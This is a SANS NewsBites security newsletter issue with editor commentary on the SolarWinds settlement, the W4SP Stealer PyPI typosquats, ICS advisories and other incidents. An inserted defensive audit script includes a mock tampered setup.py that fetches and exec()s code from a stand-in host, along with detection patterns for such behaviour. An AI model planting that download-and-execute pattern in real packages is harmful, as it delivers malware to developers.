SANS NewsBites

SolarWinds Settles Multi-Million Dollar Shareholder Lawsuit and Expects SEC Enforcement Action; Microsoft Digital Defense Report 2022; Malicious Python Packages are Being Used to Spread W4SP Stealer Trojan

November 8, 2022  |  Volume XXIV - Issue #87

Top of the News


2022-11-07

The Five ICS Cybersecurity Critical Controls

In the spirit of the Critical Security Controls, SANS instructors Robert M. Lee and Tim Conway have been working with the community to analyze all known real-world ICS cyber attacks for the purpose of creating a list of the most important cybersecurity controls for organizations to implement. You can see the results and download the paper at https://www.sans.org/white-papers/five-ics-cybersecurity-critical-controls/


2022-11-07

SolarWinds Settles Shareholder Lawsuit for $26M

SolarWinds will pay $26 million to settle a lawsuit brought by its shareholders following the 2020 supply chain attack on its Orion build process. SolarWinds says it expects to face enforcement action from the US Securities and Exchange Commission (SEC) as well.

Editor's Note

Just this settlement cost alone is many times more than SolarWinds would have spent to prevent this incident. That $26M is likely less than 20% of SolarWinds' total costs for failing to protect its development systems and product code, but raises a key point: more of these lawsuits are starting to succeed, so we are seeing more settlements.

John Pescatore

Expect the total expense to SolarWinds to be staggering when you include this settlement, regulatory fines, remediation costs and lost business. The message here: make sure that you're leveraging guidance on securing your supply chain; whether a developer, distributor or consumer, nobody gets a free ride. If you see weaknesses in your processes, use the lessons learned from SolarWinds to build a case to take action, including taking a pass on suppliers and developers who are not doing their part to ensure their software is genuine and securely maintained/delivered.

Lee Neely

An interesting defense strategy to claim they were the victim of "the most sophisticated cyberattack in history." There are parallels to a defense strategy employed by a cyber insurance company in denying a claim by using the war exclusion clause. As reported, neither strategy was successful. Adherence to basic cybersecurity practices, in this case a robust software configuration management process, would have limited the cost to the company in cleanup, recovery, and damage to the brand.

Curtis Dukes

Not only is $26M far more than preventing the problem would have cost, it is a tiny fraction of the cost to SolarWinds' customers and to our economy as a whole. That said, this may be a step toward holding suppliers accountable for distributing malicious code.

William Hugh Murray

2022-11-07

Microsoft Digital Defense Report 2022

Microsoft’s Digital Defense Report 2022 addresses the state of cybercrime, nation state threats, devices and infrastructure, cyber influence operations, and cyber resilience.

Editor's Note

One of the highlighted findings is that nation states stockpile zero-day vulnerabilities and exploits for future use. In my opinion, a nation state is not serious about preparing for a future conflict if they do not stockpile vulnerabilities to use during a crisis, and it should not be a surprise that zero days are withheld, but quickly exploited once they are discovered by others and patched.

Johannes Ullrich

The summary is a quick read which should grab your CISO's attention. Then grab the full report and dive into the Cyber Resilience section. Check the eye roll at that term: they provide background and context information for the improvements in cyber security that you can leverage in the board room and elsewhere in the business to get support for raising the bar, along with actionable insights which could also help you build your punch list of things to investigate.

Lee Neely

2022-11-05

W4SP Stealer Trojan Found in Malicious Python Packages

Researchers from Phylum have found nearly 30 malicious packages in the Python Package Index (PyPI) that attempt to infect developers' systems with the W4SP Stealer Trojan. The packages are clones of popular packages published under look-alike names that make them seem legitimate. The malicious packages have been downloaded 5,700 times.

Editor's Note

Luckily, these packages have not been downloaded very often. But they follow the proven playbook of publishing well-respected and frequently used packages under a slightly different name with malicious add-ons. This is likely going to catch developers new to Python. Python makes it relatively easy to enumerate packages used and you should regularly create lists of packages used by your code. Don't miss dependencies that may have been installed by package managers like pip.

Johannes Ullrich

The attackers used various techniques to import their trojan by modifying the __init__.py or setup.py script, which are subtle and hard to spot. That import statement creates a temporary file which is executed, downloading obfuscated code from multiple sites which contains a compressed object which is, actually, the W4SP Stealer, which is designed to steal information from users' systems including browser passwords, crypto wallets and interesting files with financial-related information. Make sure that you're using the actual package you're expecting, and the vetted version, particularly if you're using any of the packages mentioned in the Phylum report.

Lee Neely
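A small audit script in the spirit of the two notes above, added here as an example and not code from the Phylum write-up or from SANS: it enumerates every distribution installed in the running interpreter (which catches the transitive dependencies pip pulled in that never appear in your own requirements), diffs that against a pinned allowlist, flags names that are within a couple of edits of a popular package, and greps a setup.py for the behaviour described in the note (temporary file, remote fetch, exec). The allowlist, the popular-name list, the indicator patterns and the sample setup.py are all constructed for the example; the package names are illustrative and are not the packages named in the Phylum report.

```python
"""Dependency audit in the spirit of the note above (added example, not code
from the Phylum report or the newsletter): enumerate what is really installed,
diff it against a pinned allowlist, flag near-miss names, and scan an install
script for the temp-file / remote-fetch / exec behaviour described above."""
import re
from importlib import metadata

# Constructed sample data. The allowlist is what a project would keep pinned in
# requirements.txt; POPULAR is a short list of names a squatter would imitate.
# These names are illustrative, not the packages named in the Phylum report.
PINNED = {"requests": "2.28.1", "colorama": "0.4.6", "urllib3": "1.26.12"}
POPULAR = ["requests", "colorama", "urllib3", "pyyaml", "numpy"]

# Constructed stand-in for a tampered setup.py; example.invalid never resolves.
SAMPLE_SETUP_PY = '''from setuptools import setup
import tempfile, urllib.request
_p = tempfile.NamedTemporaryFile(suffix=".py", delete=False).name
open(_p, "w").write(urllib.request.urlopen("http://example.invalid/x").read().decode())
exec(open(_p).read())
setup(name="colorsama", version="0.4.6")
'''

# Indicators to look for in setup.py / __init__.py, mapped to a short label.
SUSPICIOUS = {
    "exec": r"\bexec\s*\(",
    "base64": r"\bbase64\.b64decode\b",
    "tempfile": r"\btempfile\b",
    "network": r"urllib\.request|requests\.get|socket\.",
    "subprocess": r"\bsubprocess\b",
}


def normalize(name):
    """PEP 503 name normalization so 'Colorama' and 'colorama' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a, b):
    """Levenshtein distance (classic two-row DP), used as a typosquat heuristic."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def installed_packages():
    """Every distribution visible to this interpreter, including the transitive
    dependencies pip installed that never appear in your own requirements."""
    return {normalize(d.metadata["Name"] or ""): d.version
            for d in metadata.distributions()}


def audit(installed, pinned=PINNED, popular=POPULAR, max_distance=2):
    """Return (kind, package, detail) findings: packages missing from the
    allowlist, versions that drifted from the pin, and names within a couple
    of edits of a popular package that are not themselves on the popular list."""
    findings = []
    pinned_n = {normalize(k): v for k, v in pinned.items()}
    popular_n = [normalize(p) for p in popular]
    for name, version in installed.items():
        if name not in pinned_n:
            findings.append(("unpinned", name, version))
        elif pinned_n[name] != version:
            findings.append(("version-drift", name, f"{version} != {pinned_n[name]}"))
        if name in popular_n:
            continue  # the real thing, not a look-alike
        for pop in popular_n:
            if edit_distance(name, pop) <= max_distance:
                findings.append(("possible-typosquat", name, f"looks like {pop}"))
    return findings


def scan_install_script(source):
    """Labels of SUSPICIOUS patterns present in setup.py / __init__.py text."""
    return sorted(label for label, pat in SUSPICIOUS.items() if re.search(pat, source))


if __name__ == "__main__":
    for finding in audit(installed_packages()):
        print(*finding)
    print("sample setup.py indicators:", scan_install_script(SAMPLE_SETUP_PY))
```

Run it from the virtual environment the project actually builds with; `installed_packages()` reads the interpreter's own metadata, so a package pulled in as a dependency of a dependency shows up as "unpinned" even though it is in no file you wrote. The edit-distance check is a heuristic, not proof: a hit means "go read the package page and its setup.py", and the indicator scan is only as good as the pattern list, so treat a clean result as absence of the obvious, not as a vetting.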

The Rest of the Week's News


2022-11-07

NIST NCCoE Seeking Comments on Water System Cybersecurity Guidance

The US National Institute of Standards and Technology (NIST) National Cybersecurity Center of Excellence (NCCoE) is seeking feedback from stakeholders in the water and wastewater utilities sector on a project aimed at developing cybersecurity best practices for that sector. The project “will demonstrate solutions to protect the cybersecurity of infrastructure within the operating environments of WWS sector utilities that address common cybersecurity risks among water and wastewater systems utilities.” Comments will be accepted through December 19, 2022.

Editor's Note

Each of the critical infrastructure sectors shares more in common than not when it comes to developing cybersecurity best practices. Establishing a common and prioritized set of safeguards to achieve a baseline cybersecurity posture across all sectors should be a national imperative. The CIS Critical Security Controls, starting with Implementation Group 1, are measurably effective against the top five attacks being used against every industry sector, so why not start there?

Curtis Dukes

Our water and wastewater system operators are all over the map when it comes to size and complexity. As such, it's important that smaller system operators weigh in to make sure that guidance is relevant, actionable, and not expecting organizations with deeper pockets. Also needed is guidance for operators who have outsourced services, who need to ensure those are also being operated securely.

Lee Neely

2022-11-07

US HHS Brief on Iranian Threat Actors and Healthcare

The US Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center has published an alert detailing information about Iranian threat actors conducting attacks against organizations in the healthcare sector. The brief includes an analysis of the Iranian cyberattack landscape, attack analysis, the tactics, techniques, and procedures (TTPs) observed, and mitigations.

Editor's Note

While the alert is specific to Iranian threat actors, the underlying cyberattack techniques employed are common across all threat actors. The CIS Community Defense Model uses the MITRE ATT&CK framework to document those common attack techniques into the top five attack patterns and then measures the effectiveness of the critical security controls in disrupting each of those attacks. At the end of the day, organizations want to defend themselves against cyberattack by every threat actor.

Curtis Dukes

Whether or not you see yourself as a target of Iranian threat actors, leverage the briefing, taking the listed TTPs to tabletop exercises to make sure that you're covered for these attack vectors. Make sure that you test those assumptions and address gaps.

Lee Neely

2022-11-07

US Senator Calls for Improved Healthcare Sector Cybersecurity

US Senator Mark Warner (D-Virginia) wants the Department of Health and Human Services (HHS) and the Cybersecurity and Infrastructure Security Agency (CISA) to improve their collaboration in their efforts to protect the health care sector from cyberattacks. Warner has published a policy options paper that addresses "various challenges and proposals aimed at changing the way that the health care sector addresses the cybersecurity challenges it faces."

Editor's Note

Providing actionable data to the healthcare industry is only part of the problem. Healthcare providers have to raise their own bar and increase focus on cyber security, which will require resources and may put the CISO at odds with those pushing to deliver more patient services quickly. Those CISOs can leverage resources from their local CISA offices, not just guidance but help with some activities. If you haven't been briefed on their services, reach out and ask.

Lee Neely

It would be nice if government could "protect healthcare" but that is a big order. In practice the healthcare enterprises must protect themselves.

William Hugh Murray

2022-11-04

CISA: Three ICS Vulnerability Warnings

The US Cybersecurity and Infrastructure Security Agency (CISA) has published three separate industrial control system (ICS) advisories. The vulnerabilities affect the ETIC Telecom Remote Access Server, the Nokia ASIK AirScale System Module, and Delta Industrial Automation DIALink.

Editor's Note

Updates to the affected ETIC and DIALink products have been published. Implement mitigations from Nokia until a fix is released. Also make sure that you're properly segmenting these systems, allowing only vetted users and systems to access them. Don't enable direct access from the Internet: use a secure VPN, and possibly a bastion host. Make sure that entry points require MFA where possible; don't get undone after implementing layered defenses by a credential compromise.

Lee Neely

2022-11-04

Boeing Jeppesen Cyber Incident Disrupted Some Flight Planning

Boeing subsidiary Jeppesen has "experienced a cyber incident affecting certain flight planning products and services." The incident began on November 2; Jeppesen says that as of November 5, Notice to Air Missions (NOTAM) bulletins were reactivated in its hosting environment.

Editor's Note

In this case, there were alternate NOTAM bulletin suppliers, the US FAA and the International Civil Aviation Organization. Even so, no indication was given of how hard it was to switch to the alternate suppliers. When building DR plans, make sure to include the impact and difficulty of moving to your fail-over services; ensure that switch is viable and won't do more harm than being offline. The aviation sector has become a target of attacks. According to the European Organisation for the Safety of Air Navigation, the industry is seeing ransomware attacks at a rate of one per week, and overall attacks are up as much as 530% year-on-year. That is not the sort of exercise to validate your DR plans I'm talking about. Test and vet them outside of an incident so you're ready. (And I hope you don't need them often.)

Lee Neely

2022-11-07

Medibank Will Not Pay Ransom

Australian health insurance firm Medibank will not pay a ransom demanded by attackers following a security incident that compromised the sensitive personal information of nearly 10 million customers. Medibank's CEO said that "extensive advice" suggests that paying the ransom demand would not "ensure the return of our customers' data [or] prevent it from being published."

Editor's Note

When paying the extorted ransom, there is no guarantee that your data won't surface at a later date, other than the belief that ransomware operators won't do that, to ensure they get paid moving forward. Medibank is assuming all their customer data have been accessed and advising customers accordingly. Two things to keep in mind if you find yourself in this position. First, known compromised companies are at the top of the list for attackers to attempt to "re-compromise" them, so remediation requires not only addressing the entry point but also making sure that you don't leave any behind; second, your customers are at risk for direct attacks, whether their data is being used for identity theft or leveraged to make a case for them to pay a ransom directly, in which case you need to support your customers with identity protection and information/support in the event they are targeted.

Lee Neely

2022-11-08

FBI Warns of Hacktivist Activity

The US Federal Bureau of Investigation (FBI) has published a Private Industry Notification warning that hacktivists are launching distributed denial-of-service (DDoS) attacks. The document includes recommendations for mitigating the effect of the attacks. Targets have included financial institutions, emergency services, airports, and healthcare-related facilities.

Editor's Note

The bulletin covers areas we've talked about before, which you should be following. To that list I would add making sure that you've enabled DDoS protections on your boundary, to include both your firewall and WAF. Also look at reporting discovered attacks, not just because you may have a regulatory requirement, but also to give agencies like the FBI and DHS/CISA information to go after the source.

Lee Neely

Internet Storm Center Tech Corner

IPv4 Address Representations

https://isc.sans.edu/diary/IPv4+Address+Representations/29224/


Remcos Downloader With Unicode Obfuscation

https://isc.sans.edu/diary/Remcos+Downloader+with+Unicode+Obfuscation/29220/


Windows Malware With VHD Extension

https://isc.sans.edu/diary/Windows+Malware+with+VHD+Extension/29222/


Azure AD Certificate-based Authentication (CBA) on Mobile

https://techcommunity.microsoft.com/t5/microsoft-entra-azure-ad-blog/azure-ad-certificate-based-authentication-cba-on-mobile/ba-p/2365672


Twitter Scams

https://nakedsecurity.sophos.com/2022/11/04/twitter-blue-badge-email-scams-dont-fall-for-them/


Facebook Personal Information Removal

https://www.facebook.com/contacts/removal


RSA Conference Finds Unencrypted Confidential Data in WiFi Traffic

https://www.darkreading.com/remote-workforce/unencrypted-traffic-weak-e-mail-passwords-still-undermining-wifi-security


PyPI Packages Attempting to Deliver W4SP Stealer

https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack